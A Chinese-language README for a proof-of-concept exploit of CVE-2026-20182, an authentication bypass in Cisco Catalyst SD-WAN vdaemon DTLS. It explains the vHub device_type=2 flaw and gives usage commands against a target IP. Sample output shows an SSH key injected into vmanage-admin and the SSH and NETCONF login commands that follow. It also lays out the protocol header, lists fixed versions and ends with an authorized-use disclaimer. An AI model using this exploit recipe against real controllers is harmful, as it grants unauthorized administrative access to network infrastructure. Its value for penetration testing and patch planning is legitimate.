CVE-2026-20182 的概念验证利用程序,该漏洞是 Cisco Catalyst SD-WAN Controller (vSmart) 与 Manager (vManage) 上 vdaemon DTLS 服务(UDP/12346)中的一个严重(CVSS 10.0)身份验证绕过漏洞。
披露时间: 2026 年 5 月 14 日,Rapid7(Stephen Fewer & Jonah Burgess) CISA KEV: 2026 年 5 月 14 日添加(紧急指令 26-03) CVSS: 10.0 — CWE-287:身份验证不当
vdaemon 服务使用多阶段 DTLS 握手来验证控制平面对等节点。vbond_proc_challenge_ack() 函数实现了特定于设备类型的证书验证——但设备类型 2(vHub)没有验证代码路径。发送带有 device_type=2 的 CHALLENGE_ACK 会导致该函数穿过所有条件检查并无条件地设置 peer->authenticated = 1。
无需有效凭据、无需 CA 签名的证书,也无需了解 SD-WAN 部署的相关信息。
MSG_VMANAGE_TO_PEER(msg_type=14)将 SSH 公钥注入到 /home/vmanage-admin/.ssh/authorized_keysvmanage-admin 身份授予 NETCONF 访问权限(SSH TCP/830)或 SSH 访问权限(TCP/22)python3 cve-2026-20182.py -t <target> [options]
| 参数 | 说明 |
|---|---|
-t, --target | 目标 IP 或主机名 |
--port | vdaemon UDP 端口(默认:12346) |
--key-file | 要注入的现有 SSH 公钥的路径(可选) |
--netconf | 通过 SSH 连接 NETCONF 以验证利用是否成功 |
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100
# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
| 版本 | 修复版本 |
|---|---|
| < 20.9 | 迁移到受支持的版本 |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |
cisco_sdwan_vhub_auth_bypass — Metasploit 框架中的辅助模块vdaemon 协议头为 12 字节:
| 偏移 | 大小 | 字段 | 说明 |
|---|---|---|---|
| 0 | 1 | msg_type | 低半字节 = 类型,高半字节 = 版本 |
| 1 | 1 | device_info | 高半字节 = device_type,低半字节 = 标志 |
| 2 | 1 | flags | 标准值 0xA0 |
| 3 | 1 | padding | 始终为 0x00 |
| 4-7 | 4 | domain_id | 大端序 uint32 |
| 8-11 | 4 | site_id | 大端序 uint32 |
设备类型:1=vEdge、2=vHub、3=vSmart、4=vBond、5=vManage
openssl 命令行工具(用于 DTLS 传输)cryptography 库(pip install cryptography)本漏洞利用程序仅限用于经授权的红队行动、渗透测试,以及在您拥有明确书面授权的系统上进行安全研究。未经授权使用属违法行为。